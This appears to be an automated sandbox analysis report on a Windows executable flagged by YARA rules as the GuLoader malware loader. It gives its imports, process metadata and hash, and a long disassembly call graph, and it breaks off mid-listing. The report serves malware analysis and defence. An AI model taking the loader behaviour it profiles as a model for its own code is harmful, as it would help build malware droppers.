                                RT_MANIFEST0x44da80x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States

                                Imports

                                DLLImport
                                KERNEL32.dllSleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
                                USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:08:45:18
                                Start date:20/03/2023
                                Path:C:\Users\user\Desktop\SC.028UCCP.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\SC.028UCCP.exe
                                Imagebase:0x400000
                                File size:267392 bytes
                                MD5 hash:3F8F4A7F43B5627ED45128BB99F0B471
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.782049027.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.782394015.0000000002B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.782394015.000000000400D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:21.1%
                                  Dynamic/Decrypted Code Coverage:15.5%
                                  Signature Coverage:18.7%
                                  Total number of Nodes:1484
                                  Total number of Limit Nodes:52
                                  execution_graph 4702 10001000 4705 1000101b 4702->4705 4712 100014d8 4705->4712 4707 10001020 4708 10001024 4707->4708 4709 10001027 GlobalAlloc 4707->4709 4710 100014ff 3 API calls 4708->4710 4709->4708 4711 10001019 4710->4711 4713 1000123b 3 API calls 4712->4713 4715 100014de 4713->4715 4714 100014e4 4714->4707 4715->4714 4716 100014f0 GlobalFree 4715->4716 4716->4707 4717 4019c0 4718 402a07 18 API calls 4717->4718 4719 4019c7 4718->4719 4720 402a07 18 API calls 4719->4720 4721 4019d0 4720->4721 4722 4019d7 lstrcmpiA 4721->4722 4723 4019e9 lstrcmpA 4721->4723 4724 4019dd 4722->4724 4723->4724 3785 4023c6 3796 402b11 3785->3796 3787 4023d0 3800 402a07 3787->3800 3790 4023e3 RegQueryValueExA 3791 402403 3790->3791 3795 402409 RegCloseKey 3790->3795 3791->3795 3806 405af6 wsprintfA 3791->3806 3792 40266d 3795->3792 3797 402a07 18 API calls 3796->3797 3798 402b2a 3797->3798 3799 402b38 RegOpenKeyExA 3798->3799 3799->3787 3801 402a13 3800->3801 3802 405bba 18 API calls 3801->3802 3803 402a34 3802->3803 3804 4023d9 3803->3804 3805 405e03 5 API calls 3803->3805 3804->3790 3804->3792 3805->3804 3806->3795 4728 402b4c 4729 402b74 4728->4729 4730 402b5b SetTimer 4728->4730 4731 402bc9 4729->4731 4732 402b8e MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4729->4732 4730->4729 4732->4731 4733 401ccc GetDlgItem GetClientRect 4734 402a07 18 API calls 4733->4734 4735 401cfc LoadImageA SendMessageA 4734->4735 4736 401d1a DeleteObject 4735->4736 4737 40289c 4735->4737 4736->4737 4738 40264f 4739 402a07 18 API calls 4738->4739 4740 402656 FindFirstFileA 4739->4740 4741 402679 4740->4741 4745 402669 4740->4745 4746 405af6 wsprintfA 4741->4746 4743 402680 4747 405b98 lstrcpynA 4743->4747 4746->4743 4747->4745 4748 4024cf 4749 4024d4 4748->4749 4750 4024e5 4748->4750 4751 4029ea 18 API calls 4749->4751 4752 402a07 18 API calls 4750->4752 4754 4024db 4751->4754 4753 4024ec lstrlenA 4752->4753 4753->4754 4755 40250b WriteFile 4754->4755 4756 40266d 4754->4756 4755->4756 4757 401650 4758 402a07 18 API calls 4757->4758 4759 401657 4758->4759 4760 402a07 18 API calls 4759->4760 4761 401660 4760->4761 4762 402a07 18 API calls 4761->4762 4763 401669 MoveFileA 4762->4763 4764 401675 4763->4764 4765 40167c 4763->4765 4767 401423 25 API calls 4764->4767 4766 405e9c 2 API calls 4765->4766 4769 40217f 4765->4769 4768 40168b 4766->4768 4767->4769 4768->4769 4770 405a4c 40 API calls 4768->4770 4770->4764 4771 10002110 4772 10002175 4771->4772 4773 100021ab 4771->4773 4772->4773 4774 10002187 GlobalAlloc 4772->4774 4774->4772 4475 4039d5 4476 403b28 4475->4476 4477 4039ed 4475->4477 4479 403b79 4476->4479 4480 403b39 GetDlgItem GetDlgItem 4476->4480 4477->4476 4478 4039f9 4477->4478 4481 403a04 SetWindowPos 4478->4481 4482 403a17 4478->4482 4484 403bd3 4479->4484 4492 401389 2 API calls 4479->4492 4483 403ea8 19 API calls 4480->4483 4481->4482 4486 403a34 4482->4486 4487 403a1c ShowWindow 4482->4487 4488 403b63 KiUserCallbackDispatcher 4483->4488 4485 403ef4 SendMessageA 4484->4485 4537 403b23 4484->4537 4535 403be5 4485->4535 4489 403a56 4486->4489 4490 403a3c DestroyWindow 4486->4490 4487->4486 4491 40140b 2 API calls 4488->4491 4494 403a5b SetWindowLongA 4489->4494 4495 403a6c 4489->4495 4493 403e52 4490->4493 4491->4479 4496 403bab 4492->4496 4503 403e62 ShowWindow 4493->4503 4493->4537 4494->4537 4500 403b15 4495->4500 4501 403a78 GetDlgItem 4495->4501 4496->4484 4497 403baf SendMessageA 4496->4497 4497->4537 4498 40140b 2 API calls 4498->4535 4499 403e33 DestroyWindow EndDialog 4499->4493 4502 403f0f 8 API calls 4500->4502 4504 403aa8 4501->4504 4505 403a8b SendMessageA IsWindowEnabled 4501->4505 4502->4537 4503->4537 4507 403ab5 4504->4507 4508 403afc SendMessageA 4504->4508 4509 403ac8 4504->4509 4517 403aad 4504->4517 4505->4504 4505->4537 4506 405bba 18 API calls 4506->4535 4507->4508 4507->4517 4508->4500 4511 403ad0 4509->4511 4512 403ae5 4509->4512 4514 40140b 2 API calls 4511->4514 4515 40140b 2 API calls 4512->4515 4513 403ae3 4513->4500 4514->4517 4518 403aec 4515->4518 4516 403ea8 19 API calls 4516->4535 4549 403e81 4517->4549 4518->4500 4518->4517 4519 403ea8 19 API calls 4520 403c60 GetDlgItem 4519->4520 4521 403c75 4520->4521 4522 403c7d ShowWindow KiUserCallbackDispatcher 4520->4522 4521->4522 4546 403eca EnableWindow 4522->4546 4524 403ca7 EnableWindow 4527 403cbb 4524->4527 4525 403cc0 GetSystemMenu EnableMenuItem SendMessageA 4526 403cf0 SendMessageA 4525->4526 4525->4527 4526->4527 4527->4525 4547 403edd SendMessageA 4527->4547 4548 405b98 lstrcpynA 4527->4548 4530 403d1e lstrlenA 4531 405bba 18 API calls 4530->4531 4532 403d2f SetWindowTextA 4531->4532 4533 401389 2 API calls 4532->4533 4533->4535 4534 403d73 DestroyWindow 4534->4493 4536 403d8d CreateDialogParamA 4534->4536 4535->4498 4535->4499 4535->4506 4535->4516 4535->4519 4535->4534 4535->4537 4536->4493 4538 403dc0 4536->4538 4539 403ea8 19 API calls 4538->4539 4540 403dcb GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4539->4540 4541 401389 2 API calls 4540->4541 4542 403e11 4541->4542 4542->4537 4543 403e19 ShowWindow 4542->4543 4544 403ef4 SendMessageA 4543->4544 4545 403e31 4544->4545 4545->4493 4546->4524 4547->4527 4548->4530 4550 403e88 4549->4550 4551 403e8e SendMessageA 4549->4551 4550->4551 4551->4513 4556 4014d6 4557 4029ea 18 API calls 4556->4557 4558 4014dc Sleep 4557->4558 4560 40289c 4558->4560 4775 401dd8 4776 402a07 18 API calls 4775->4776 4777 401dde 4776->4777 4778 402a07 18 API calls 4777->4778 4779 401de7 4778->4779 4780 402a07 18 API calls 4779->4780 4781 401df0 4780->4781 4782 402a07 18 API calls 4781->4782 4783 401df9 4782->4783 4784 401423 25 API calls 4783->4784 4785 401e00 ShellExecuteA 4784->4785 4786 401e2d 4785->4786 4787 40155b 4788 401577 ShowWindow 4787->4788 4789 40157e 4787->4789 4788->4789 4790 40158c ShowWindow 4789->4790 4791 40289c 4789->4791 4790->4791 4792 401edc 4793 402a07 18 API calls 4792->4793 4794 401ee3 GetFileVersionInfoSizeA 4793->4794 4795 401f06 GlobalAlloc 4794->4795 4797 401f5c 4794->4797 4796 401f1a GetFileVersionInfoA 4795->4796 4795->4797 4796->4797 4798 401f2b VerQueryValueA 4796->4798 4798->4797 4799 401f44 4798->4799 4803 405af6 wsprintfA 4799->4803 4801 401f50 4804 405af6 wsprintfA 4801->4804 4803->4801 4804->4797 4629 4025dd 4630 4025e4 4629->4630 4636 402849 4629->4636 4631 4029ea 18 API calls 4630->4631 4632 4025ef 4631->4632 4633 4025f6 SetFilePointer 4632->4633 4634 402606 4633->4634 4633->4636 4637 405af6 wsprintfA 4634->4637 4637->4636 4810 4018e3 4811 40191a 4810->4811 4812 402a07 18 API calls 4811->4812 4813 40191f 4812->4813 4814 405475 71 API calls 4813->4814 4815 401928 4814->4815 4816 404fe3 4817 405004 GetDlgItem GetDlgItem GetDlgItem 4816->4817 4818 40518f 4816->4818 4862 403edd SendMessageA 4817->4862 4820 4051c0 4818->4820 4821 405198 GetDlgItem CreateThread CloseHandle 4818->4821 4823 4051eb 4820->4823 4824 4051d7 ShowWindow ShowWindow 4820->4824 4825 40520d 4820->4825 4821->4820 4822 405075 4830 40507c GetClientRect GetSystemMetrics SendMessageA SendMessageA 4822->4830 4826 405249 4823->4826 4827 405222 ShowWindow 4823->4827 4828 4051fc 4823->4828 4864 403edd SendMessageA 4824->4864 4829 403f0f 8 API calls 4825->4829 4826->4825 4837 405254 SendMessageA 4826->4837 4833 405242 4827->4833 4834 405234 4827->4834 4832 403e81 SendMessageA 4828->4832 4842 40521b 4829->4842 4835 4050eb 4830->4835 4836 4050cf SendMessageA SendMessageA 4830->4836 4832->4825 4839 403e81 SendMessageA 4833->4839 4838 404ea5 25 API calls 4834->4838 4840 4050f0 SendMessageA 4835->4840 4841 4050fe 4835->4841 4836->4835 4837->4842 4843 40526d CreatePopupMenu 4837->4843 4838->4833 4839->4826 4840->4841 4845 403ea8 19 API calls 4841->4845 4844 405bba 18 API calls 4843->4844 4847 40527d AppendMenuA 4844->4847 4846 40510e 4845->4846 4850 405117 ShowWindow 4846->4850 4851 40514b GetDlgItem SendMessageA 4846->4851 4848 405290 GetWindowRect 4847->4848 4849 4052a3 4847->4849 4852 4052ac TrackPopupMenu 4848->4852 4849->4852 4853 40513a 4850->4853 4854 40512d ShowWindow 4850->4854 4851->4842 4855 405172 SendMessageA SendMessageA 4851->4855 4852->4842 4856 4052ca 4852->4856 4863 403edd SendMessageA 4853->4863 4854->4853 4855->4842 4857 4052e6 SendMessageA 4856->4857 4857->4857 4859 405303 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4857->4859 4860 405325 SendMessageA 4859->4860 4860->4860 4861 405347 GlobalUnlock SetClipboardData CloseClipboard 4860->4861 4861->4842 4862->4822 4863->4851 4864->4823 4865 4042e6 4866 404312 4865->4866 4867 404323 4865->4867 4926 4053ad GetDlgItemTextA 4866->4926 4869 40432f GetDlgItem 4867->4869 4875 40438e 4867->4875 4872 404343 4869->4872 4870 404472 4874 40460d 4870->4874 4928 4053ad GetDlgItemTextA 4870->4928 4871 40431d 4873 405e03 5 API calls 4871->4873 4877 404357 SetWindowTextA 4872->4877 4878 4056de 4 API calls 4872->4878 4873->4867 4882 403f0f 8 API calls 4874->4882 4875->4870 4875->4874 4879 405bba 18 API calls 4875->4879 4881 403ea8 19 API calls 4877->4881 4883 40434d 4878->4883 4884 404402 SHBrowseForFolderA 4879->4884 4880 4044a2 4885 405733 18 API calls 4880->4885 4886 404373 4881->4886 4887 404621 4882->4887 4883->4877 4891 405645 3 API calls 4883->4891 4884->4870 4888 40441a CoTaskMemFree 4884->4888 4889 4044a8 4885->4889 4890 403ea8 19 API calls 4886->4890 4892 405645 3 API calls 4888->4892 4929 405b98 lstrcpynA 4889->4929 4893 404381 4890->4893 4891->4877 4894 404427 4892->4894 4927 403edd SendMessageA 4893->4927 4897 40445e SetDlgItemTextA 4894->4897 4902 405bba 18 API calls 4894->4902 4897->4870 4898 404387 4900 405ec3 3 API calls 4898->4900 4899 4044bf 4901 405ec3 3 API calls 4899->4901 4900->4875 4908 4044c7 4901->4908 4903 404446 lstrcmpiA 4902->4903 4903->4897 4906 404457 lstrcatA 4903->4906 4904 404501 4930 405b98 lstrcpynA 4904->4930 4906->4897 4907 404508 4909 4056de 4 API calls 4907->4909 4908->4904 4912 40568c 2 API calls 4908->4912 4914 404552 4908->4914 4910 40450e GetDiskFreeSpaceA 4909->4910 4913 404530 MulDiv 4910->4913 4910->4914 4912->4908 4913->4914 4915 4045bc 4914->4915 4917 40468e 21 API calls 4914->4917 4916 4045df 4915->4916 4918 40140b 2 API calls 4915->4918 4931 403eca EnableWindow 4916->4931 4919 4045ae 4917->4919 4918->4916 4921 4045b3 4919->4921 4922 4045be SetDlgItemTextA 4919->4922 4924 40468e 21 API calls 4921->4924 4922->4915 4923 4045fb 4923->4874 4932 40427b 4923->4932 4924->4915 4926->4871 4927->4898 4928->4880 4929->4899 4930->4907 4931->4923 4933 404289 4932->4933 4934 40428e SendMessageA 4932->4934 4933->4934 4934->4874 4935 4018e6 4936 402a07 18 API calls 4935->4936 4937 4018ed 4936->4937 4938 4053c9 MessageBoxIndirectA 4937->4938 4939 4018f6 4938->4939 3807 401f68 3808 401f7a 3807->3808 3809 402028 3807->3809 3810 402a07 18 API calls 3808->3810 3812 401423 25 API calls 3809->3812 3811 401f81 3810->3811 3813 402a07 18 API calls 3811->3813 3818 40217f 3812->3818 3814 401f8a 3813->3814 3815 401f92 GetModuleHandleA 3814->3815 3816 401f9f LoadLibraryExA 3814->3816 3815->3816 3817 401faf GetProcAddress 3815->3817 3816->3809 3816->3817 3819 401ffb 3817->3819 3820 401fbe 3817->3820 3874 404ea5 3819->3874 3822 401fc6 3820->3822 3823 401fdd 3820->3823 3871 401423 3822->3871 3828 100016da 3823->3828 3825 401fce 3825->3818 3826 40201c FreeLibrary 3825->3826 3826->3818 3829 1000170a 3828->3829 3885 10001a86 3829->3885 3831 10001711 3832 10001827 3831->3832 3833 10001722 3831->3833 3834 10001729 3831->3834 3832->3825 3935 10002165 3833->3935 3916 100021af 3834->3916 3839 1000178d 3846 10001793 3839->3846 3847 100017cf 3839->3847 3840 1000176f 3948 1000236d 3840->3948 3841 10001758 3843 1000175d 3841->3843 3857 1000174e 3841->3857 3842 1000173f 3845 10001745 3842->3845 3851 10001750 3842->3851 3945 10002a57 3843->3945 3845->3857 3929 1000279c 3845->3929 3853 10001576 3 API calls 3846->3853 3849 1000236d 13 API calls 3847->3849 3855 100017c1 3849->3855 3939 10002540 3851->3939 3854 100017a9 3853->3854 3859 1000236d 13 API calls 3854->3859 3860 100017d6 3855->3860 3857->3839 3857->3840 3859->3855 3870 10001816 3860->3870 3973 10002333 3860->3973 3863 10001820 GlobalFree 3863->3832 3867 10001802 3867->3870 3977 100014ff wsprintfA 3867->3977 3868 100017fb FreeLibrary 3868->3867 3870->3832 3870->3863 3872 404ea5 25 API calls 3871->3872 3873 401431 3872->3873 3873->3825 3875 404ec0 3874->3875 3883 404f63 3874->3883 3876 404edd lstrlenA 3875->3876 3877 405bba 18 API calls 3875->3877 3878 404f06 3876->3878 3879 404eeb lstrlenA 3876->3879 3877->3876 3881 404f19 3878->3881 3882 404f0c SetWindowTextA 3878->3882 3880 404efd lstrcatA 3879->3880 3879->3883 3880->3878 3881->3883 3884 404f1f SendMessageA SendMessageA SendMessageA 3881->3884 3882->3881 3883->3825 3884->3883 3980 10001215 GlobalAlloc 3885->3980 3887 10001aaa 3981 10001215 GlobalAlloc 3887->3981 3889 10001ab5 3982 1000123b 3889->3982 3891 10001cc5 GlobalFree GlobalFree GlobalFree 3892 10001ce2 3891->3892 3895 10001d2c 3891->3895 3893 1000201b 3892->3893 3892->3895 3902 10001cf7 3892->3902 3893->3895 3896 1000203c GetModuleHandleA 3893->3896 3894 10001b6f GlobalAlloc 3906 10001abd 3894->3906 3895->3831 3898 1000204d LoadLibraryA 3896->3898 3899 1000205e 3896->3899 3897 10001be3 GlobalFree 3897->3906 3898->3895 3898->3899 3993 100015c1 GetProcAddress 3899->3993 3900 10001bbe lstrcpyA 3903 10001bc8 lstrcpyA 3900->3903 3902->3895 3989 10001224 3902->3989 3903->3906 3904 10002070 3904->3895 3905 10002081 lstrlenA 3904->3905 3994 100015c1 GetProcAddress 3905->3994 3906->3891 3906->3894 3906->3897 3906->3900 3906->3903 3910 10001fbf lstrcpyA 3906->3910 3912 10001e78 GlobalFree 3906->3912 3914 10001224 2 API calls 3906->3914 3915 10001c25 3906->3915 3992 10001215 GlobalAlloc 3906->3992 3910->3906 3911 1000209a 3911->3895 3912->3906 3914->3906 3915->3906 3987 10001551 GlobalSize GlobalAlloc 3915->3987 3921 100021c7 3916->3921 3917 1000123b 3 API calls 3917->3921 3919 100022fc GlobalFree 3920 1000172f 3919->3920 3919->3921 3920->3841 3920->3842 3920->3857 3921->3917 3921->3919 3922 10001224 GlobalAlloc lstrcpynA 3921->3922 3923 10002284 GlobalAlloc MultiByteToWideChar 3921->3923 3926 10002263 lstrlenA 3921->3926 3997 100012bf 3921->3997 3922->3921 3924 10002272 3923->3924 3925 100022ae GlobalAlloc 3923->3925 3924->3919 4002 100024d4 3924->4002 3927 100022c5 GlobalFree 3925->3927 3926->3919 3926->3924 3927->3919 3930 100027ae 3929->3930 3931 10002853 ReadFile 3930->3931 3932 10002871 3931->3932 3933 10002962 GetLastError 3932->3933 3934 1000296d 3932->3934 3933->3934 3934->3857 3936 10002175 3935->3936 3937 10001728 3935->3937 3936->3937 3938 10002187 GlobalAlloc 3936->3938 3937->3834 3938->3936 3942 1000255c 3939->3942 3940 100025c0 3943 100025c5 GlobalSize 3940->3943 3944 100025cf 3940->3944 3941 100025ad GlobalAlloc 3941->3944 3942->3940 3942->3941 3943->3944 3944->3857 3946 10002a62 3945->3946 3947 10002aa2 GlobalFree 3946->3947 3953 10002388 3948->3953 3950 1000246c lstrcpyA 3950->3953 3951 100023cc wsprintfA 3951->3953 3952 10002444 lstrcpynA 3952->3953 3953->3950 3953->3951 3953->3952 3954 1000248d GlobalFree 3953->3954 3955 100024b6 GlobalFree 3953->3955 3956 10002421 WideCharToMultiByte 3953->3956 3958 100023e0 GlobalAlloc 3953->3958 3959 10001278 2 API calls 3953->3959 4005 10001215 GlobalAlloc 3953->4005 4006 100012e8 3953->4006 3954->3953 3955->3953 3957 10001775 3955->3957 3956->3953 3962 10001576 3957->3962 3961 10002401 WideCharToMultiByte GlobalFree 3958->3961 3959->3953 3961->3953 4010 10001215 GlobalAlloc 3962->4010 3964 1000157c 3965 10001589 lstrcpyA 3964->3965 3967 100015a3 3964->3967 3969 100015bd 3965->3969 3968 100015a8 wsprintfA 3967->3968 3967->3969 3968->3969 3970 10001278 3969->3970 3971 10001281 GlobalAlloc lstrcpynA 3970->3971 3972 100012ba GlobalFree 3970->3972 3971->3972 3972->3860 3974 10002341 3973->3974 3975 100017e2 3973->3975 3974->3975 3976 1000235a GlobalFree 3974->3976 3975->3867 3975->3868 3976->3974 3978 10001278 2 API calls 3977->3978 3979 10001520 3978->3979 3979->3870 3980->3887 3981->3889 3983 10001274 3982->3983 3984 10001245 3982->3984 3983->3906 3984->3983 3995 10001215 GlobalAlloc 3984->3995 3986 10001251 lstrcpyA GlobalFree 3986->3906 3988 1000156f 3987->3988 3988->3915 3996 10001215 GlobalAlloc 3989->3996 3991 10001233 lstrcpynA 3991->3895 3992->3906 3993->3904 3994->3911 3995->3986 3996->3991 3998 100012e3 3997->3998 3999 100012c7 3997->3999 3998->3998 3999->3998 4000 10001224 2 API calls 3999->4000 4001 100012e1 4000->4001 4001->3921 4003 100024e2 VirtualAlloc 4002->4003 4004 10002538 4002->4004 4003->4004 4004->3924 4005->3953 4007 100012f1 4006->4007 4008 10001316 4006->4008 4007->4008 4009 100012fd lstrcpyA 4007->4009 4008->3953 4009->4008 4010->3964 4940 1000182a 4941 1000123b 3 API calls 4940->4941 4942 10001850 4941->4942 4943 1000123b 3 API calls 4942->4943 4944 10001858 4943->4944 4945 1000123b 3 API calls 4944->4945 4947 10001895 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4944->4947 4946 1000187a 4945->4946 4948 10001883 GlobalFree 4946->4948 4949 10001278 2 API calls 4947->4949 4948->4947 4950 10001a0c GlobalFree GlobalFree 4949->4950 4951 4014f0 SetForegroundWindow 4952 40289c 4951->4952 4953 401af0 4954 402a07 18 API calls 4953->4954 4955 401af7 4954->4955 4956 4029ea 18 API calls 4955->4956 4957 401b00 wsprintfA 4956->4957 4958 40289c 4957->4958 4433 4019f1 4434 402a07 18 API calls 4433->4434 4435 4019fa ExpandEnvironmentStringsA 4434->4435 4436 401a0e 4435->4436 4438 401a21 4435->4438 4437 401a13 lstrcmpA 4436->4437 4436->4438 4437->4438 4959 403ff1 4960 404007 4959->4960 4965 404113 4959->4965 4962 403ea8 19 API calls 4960->4962 4961 404182 4963 404256 4961->4963 4964 40418c GetDlgItem 4961->4964 4966 40405d 4962->4966 4971 403f0f 8 API calls 4963->4971 4967 4041a2 4964->4967 4968 404214 4964->4968 4965->4961 4965->4963 4969 404157 GetDlgItem SendMessageA 4965->4969 4970 403ea8 19 API calls 4966->4970 4967->4968 4974 4041c8 6 API calls 4967->4974 4968->4963 4975 404226 4968->4975 4990 403eca EnableWindow 4969->4990 4973 40406a CheckDlgButton 4970->4973 4982 404251 4971->4982 4988 403eca EnableWindow 4973->4988 4974->4968 4978 40422c SendMessageA 4975->4978 4979 40423d 4975->4979 4976 40417d 4980 40427b SendMessageA 4976->4980 4978->4979 4979->4982 4983 404243 SendMessageA 4979->4983 4980->4961 4981 404088 GetDlgItem 4989 403edd SendMessageA 4981->4989 4983->4982 4985 40409e SendMessageA 4986 4040c5 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4985->4986 4987 4040bc GetSysColor 4985->4987 4986->4982 4987->4986 4988->4981 4989->4985 4990->4976 4991 10001637 4992 10001666 4991->4992 4993 10001a86 19 API calls 4992->4993 4994 1000166d 4993->4994 4995 10001680 4994->4995 4996 10001674 4994->4996 4998 100016a7 4995->4998 4999 1000168a 4995->4999 4997 10001278 2 API calls 4996->4997 5003 1000167e 4997->5003 5001 100016d1 4998->5001 5002 100016ad 4998->5002 5000 100014ff 3 API calls 4999->5000 5004 1000168f 5000->5004 5006 100014ff 3 API calls 5001->5006 5005 10001576 3 API calls 5002->5005 5007 10001576 3 API calls 5004->5007 5008 100016b2 5005->5008 5006->5003 5009 10001695 5007->5009 5010 10001278 2 API calls 5008->5010 5011 10001278 2 API calls 5009->5011 5012 100016b8 GlobalFree 5010->5012 5013 1000169b GlobalFree 5011->5013 5012->5003 5014 100016cc GlobalFree 5012->5014 5013->5003 5014->5003 5015 402877 SendMessageA 5016 402891 InvalidateRect 5015->5016 5017 40289c 5015->5017 5016->5017 5018 401c78 5019 4029ea 18 API calls 5018->5019 5020 401c7e IsWindow 5019->5020 5021 4019e1 5020->5021 5022 1000103d 5023 1000101b 8 API calls 5022->5023 5024 10001056 5023->5024 5025 40227d 5026 402a07 18 API calls 5025->5026 5027 40228e 5026->5027 5028 402a07 18 API calls 5027->5028 5029 402297 5028->5029 5030 402a07 18 API calls 5029->5030 5031 4022a1 GetPrivateProfileStringA 5030->5031 5032 4014fe 5033 401506 5032->5033 5035 401519 5032->5035 5034 4029ea 18 API calls 5033->5034 5034->5035 5036 401000 5037 401037 BeginPaint GetClientRect 5036->5037 5038 40100c DefWindowProcA 5036->5038 5040 4010f3 5037->5040 5041 401179 5038->5041 5042 401073 CreateBrushIndirect FillRect DeleteObject 5040->5042 5043 4010fc 5040->5043 5042->5040 5044 401102 CreateFontIndirectA 5043->5044 5045 401167 EndPaint 5043->5045 5044->5045 5046 401112 6 API calls 5044->5046 5045->5041 5046->5045 5047 403601 5048 40360c 5047->5048 5049 403610 5048->5049 5050 403613 GlobalAlloc 5048->5050 5050->5049 3782 100026c2 3783 10002712 3782->3783 3784 100026d2 VirtualProtect 3782->3784 3784->3783 5051 401705 5052 402a07 18 API calls 5051->5052 5053 40170c SearchPathA 5052->5053 5054 4027c7 5053->5054 5055 401727 5053->5055 5055->5054 5057 405b98 lstrcpynA 5055->5057 5057->5054 5058 402188 5059 402a07 18 API calls 5058->5059 5060 40218e 5059->5060 5061 402a07 18 API calls 5060->5061 5062 402197 5061->5062 5063 402a07 18 API calls 5062->5063 5064 4021a0 5063->5064 5065 405e9c 2 API calls 5064->5065 5066 4021a9 5065->5066 5067 4021ba lstrlenA lstrlenA 5066->5067 5068 4021ad 5066->5068 5070 404ea5 25 API calls 5067->5070 5069 404ea5 25 API calls 5068->5069 5072 4021b5 5068->5072 5069->5072 5071 4021f6 SHFileOperationA 5070->5071 5071->5068 5071->5072 5073 40220a 5074 402211 5073->5074 5077 402224 5073->5077 5075 405bba 18 API calls 5074->5075 5076 40221e 5075->5076 5078 4053c9 MessageBoxIndirectA 5076->5078 5078->5077 4011 40310b #17 SetErrorMode OleInitialize 4084 405ec3 GetModuleHandleA 4011->4084 4015 40317b GetCommandLineA 4089 405b98 lstrcpynA 4015->4089 4017 40318d GetModuleHandleA 4018 4031a4 4017->4018 4019 405670 CharNextA 4018->4019 4020 4031b8 CharNextA 4019->4020 4028 4031c8 4020->4028 4021 403292 4022 4032a5 GetTempPathA 4021->4022 4090 4030d7 4022->4090 4024 4032bd 4025 4032c1 GetWindowsDirectoryA lstrcatA 4024->4025 4026 403317 DeleteFileA 4024->4026 4029 4030d7 11 API calls 4025->4029 4098 402c33 GetTickCount GetModuleFileNameA 4026->4098 4027 405670 CharNextA 4027->4028 4028->4021 4028->4027 4033 403294 4028->4033 4032 4032dd 4029->4032 4031 40332b 4039 405670 CharNextA 4031->4039 4068 4033b1 4031->4068 4079 4033c1 4031->4079 4032->4026 4035 4032e1 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4032->4035 4180 405b98 lstrcpynA 4033->4180 4037 4030d7 11 API calls 4035->4037 4041 40330f 4037->4041 4042 403346 4039->4042 4041->4026 4041->4079 4049 4033f0 lstrcatA lstrcmpiA 4042->4049 4050 40338c 4042->4050 4043 4033da 4204 4053c9 4043->4204 4044 4034ce 4045 403551 ExitProcess 4044->4045 4047 405ec3 3 API calls 4044->4047 4052 4034dd 4047->4052 4054 40340c CreateDirectoryA SetCurrentDirectoryA 4049->4054 4049->4079 4181 405733 4050->4181 4055 405ec3 3 